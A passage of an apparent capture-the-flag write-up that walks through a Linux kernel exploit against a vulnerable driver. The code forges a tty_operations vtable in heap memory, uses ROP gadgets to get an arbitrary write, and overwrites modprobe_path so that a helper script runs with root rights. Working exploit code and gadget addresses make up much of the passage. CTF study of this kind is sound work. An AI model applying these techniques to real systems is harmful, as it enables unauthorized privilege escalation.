// (the writeup: "fix the next_ptr after that").
((uint64_t *)(buf + 32))[512/8] = next_ptr;
ioctl_add_desc(0, buf);
An additional step that I do after overwrite the first next_ptr is that I also
fix the next_ptr after that to point to the original next_ptr (that will become book2
).
A bug that it took me some time to fix was that I was trying to write inside uf_page
the
heap_ptr + 32
, however it triggered the pagefault in user-space. To bypass that
I mmaped uf_page
with size 0x2000 bytes and registered the pagefault in the first 0x1000
bytes. In this way I can write inside uf_page + 0xf00 + 0x200
the heap_ptr + 32
(without problems),
and pass as ptr to add_desc
0xcccf00 that triggers the right pagefault in the kernel.
tty_operations
is the virtual table used by the tty, since SMAP is active
we can't craft a fake vtable in user-space. However we can forge a fake vtable
inside book2
since we have its address.
struct tty_operations {
struct tty_struct * (*lookup)(struct tty_driver *, struct file *, int); /* 0 8 */
int (*install)(struct tty_driver *, struct tty_struct *); /* 8 8 */
void (*remove)(struct tty_driver *, struct tty_struct *); /* 16 8 */
int (*open)(struct tty_struct *, struct file *); /* 24 8 */
void (*close)(struct tty_struct *, struct file *); /* 32 8 */
void (*shutdown)(struct tty_struct *); /* 40 8 */
void (*cleanup)(struct tty_struct *); /* 48 8 */
int (*write)(struct tty_struct *, const unsigned char *, int); /* 56 8 */
/* --- cacheline 1 boundary (64 bytes) --- */
int (*put_char)(struct tty_struct *, unsigned char); /* 64 8 */
void (*flush_chars)(struct tty_struct *); /* 72 8 */
int (*write_room)(struct tty_struct *); /* 80 8 */
int (*chars_in_buffer)(struct tty_struct *); /* 88 8 */
int (*ioctl)(struct tty_struct *, unsigned int, long unsigned int); /* 96 8 */
long int (*compat_ioctl)(struct tty_struct *, unsigned int, long unsigned int); /* 104 8 */
void (*set_termios)(struct tty_struct *, struct ktermios *); /* 112 8 */
void (*throttle)(struct tty_struct *); /* 120 8 */
/* --- cacheline 2 boundary (128 bytes) --- */
void (*unthrottle)(struct tty_struct *); /* 128 8 */
void (*stop)(struct tty_struct *); /* 136 8 */
void (*start)(struct tty_struct *); /* 144 8 */
void (*hangup)(struct tty_struct *); /* 152 8 */
int (*break_ctl)(struct tty_struct *, int); /* 160 8 */
void (*flush_buffer)(struct tty_struct *); /* 168 8 */
void (*set_ldisc)(struct tty_struct *); /* 176 8 */
void (*wait_until_sent)(struct tty_struct *, int); /* 184 8 */
/* --- cacheline 3 boundary (192 bytes) --- */
void (*send_xchar)(struct tty_struct *, char); /* 192 8 */
int (*tiocmget)(struct tty_struct *); /* 200 8 */
int (*tiocmset)(struct tty_struct *, unsigned int, unsigned int); /* 208 8 */
int (*resize)(struct tty_struct *, struct winsize *); /* 216 8 */
int (*get_icount)(struct tty_struct *, struct serial_icounter_struct *); /* 224 8 */
int (*get_serial)(struct tty_struct *, struct serial_struct *); /* 232 8 */
int (*set_serial)(struct tty_struct *, struct serial_struct *); /* 240 8 */
void (*show_fdinfo)(struct tty_struct *, struct seq_file *); /* 248 8 */
/* --- cacheline 4 boundary (256 bytes) --- */
int (*proc_show)(struct seq_file *, void *); /* 256 8 */
/* size: 264, cachelines: 5, members: 33 */
/* last cacheline: 8 bytes */
};
There are some functions where we can control the parameters from user-space,
for example with ioctl
we control esi and rdx.
Basically our syscall ioctl(ptmx, esi, rdx)
will become ioctl(&tty_struct, esi, rdx)
.
I tried with write
but it doesn't seems controllable with parameters passed
from the write
in user-space (Maybe I was doing something wrong).
We can overwrite the address of tty_driver
inside the struct and try to call
remove, install, lookup to control rdi
but I didn't try.
I found https://pr0cf5.github.io/ctf/2020/03/09/the-plight-of-tty-in-the-linux-kernel.html that gives some tips on what gadgets are useful.
I found with ROPgadget
:
103448:0xffffffff8113e9b1 : mov dword ptr [rdx], esi ; ret // WRITE
122013:0xffffffff81034e74 : mov rax, qword ptr [rsi] ; ret // READ
I opted to overwrite modprobe_path
to read the flag. Another strategy was to use
read the list of task_struct
until I found my process and then with the write primitive
overwrite the uid=0
. However I needed to get the right offset (it depends on
kernel version and compilation flags) and modprobe_path
was easier.
So my plan was the following (in red the tty_struct):
// 4th stage write on modprobe_path
ioctl_add(1);
ioctl_add(2);
// The description of book 2 is laid out as a fake tty_operations table.
// Offsets follow the pahole listing in the writeup: 32 = close,
// 40 = shutdown, 48 = cleanup, 96 = ioctl.
((uint64_t *)buf)[32 / 8] = dummy_ret; // cleanup functions
((uint64_t *)buf)[40 / 8] = dummy_ret;
((uint64_t *)buf)[48 / 8] = dummy_ret;
((uint64_t *)buf)[96 / 8] = mov_addr_rdx_esi; // ioctl function -> arbitrary write
ioctl_add_desc(2, buf);
ioctl_get_desc(2, buf);
// This part is not needed
book_details b = {
.index = 0,
.next = (void *)(heap_ptr + 32),
.prev = NULL,
};
memcpy(buf + BOOK_DESCRIPTION_SIZE - 0x20, &b, 0x18);
print_leak((uint64_t *)buf, BOOK_DESCRIPTION_SIZE);
ioctl_add_desc(1, buf);
Then:
// Free book 1 and open /dev/ptmx so that (per the writeup) the new
// tty_struct takes its place, overlapping the description of book 0.
ioctl_remove(1);
ptmx = open("/dev/ptmx", O_RDWR | O_NOCTTY);
// Read the tty_struct through book 0, patch one field and write it back.
ioctl_get_desc(0, buf);
memset(buf, 0, BOOK_DESCRIPTION_SIZE);
memcpy(buf, leak, BOOK_DESCRIPTION_SIZE);
((uint64_t *)buf)[7] = next_ptr; // overwrite pointer to vtable
ioctl_add_desc(0, buf);
// Each call stores 4 bytes (the command value) at the address given as argument.
ioctl(ptmx, *(int *)new_modprobe_path, modprobe_path); // trigger ioctl call inside vtable
ioctl(ptmx, *(int *)(new_modprobe_path + 4), modprobe_path + 4);
ioctl(ptmx, *(int *)(new_modprobe_path + 8), modprobe_path + 8);
// Create and run a file with an unknown header, plus the helper script
// that makes the flag readable.
system("echo -ne '\\xff\\xff\\xff\\xff' > /home/ctf/bho");
system("chmod +x /home/ctf/bho");
system("echo -ne '#!/bin/sh\nchmod 777 /flag.txt' > /home/ctf/a\n");
system("chmod +x /home/ctf/a");
system("/home/ctf/bho");
To upload the exploit on the server I recommend to compile with musl-gcc:
musl-gcc exploit.c -o /tmp/exploit -static -lpthread
For arch linux download:
yay -S musl kernel-headers-musl
3k{SM4P_4LWAYS_MAKES_1T_D1FFICULT_BUT_N0T_IMP0SSIBLE}
Everything works, but I wanted to control RIP with a rop chain. To do that I tried
to find a stack pivot gadget to make rsp = address of book2, and to write inside
book2 a rop chain that calls commit_creds(prepare_kernel_cred(0)).
I wasn't able to find such a gadget.
There is this gadget 0xffffffff816467dd : push rdi ; pop rsp ; imul esp, dword ptr [rdx + 0x72], 0x616cef89 ; retf
that maybe could be used to stack pivot. To call correctly this gadget I tried
to call the remove
operations with close(ptmx)
.
I set as tty_driver ptr inside tty_struct = &book2 + 256
, +256 because in the first
256 bytes there is the tty_operations fake vtable.
Then I copied a fake tty_driver struct inside and changed the ops
to point
to next_ptr = &book2
. This is needed because the remove
operation is called
from the tty_driver
, not the tty_struct
(https://elixir.bootlin.com/linux/v5.10.38/source/drivers/tty/tty_io.c#L1324).
However, I get a pagefault after the push rdi, and I don't know why.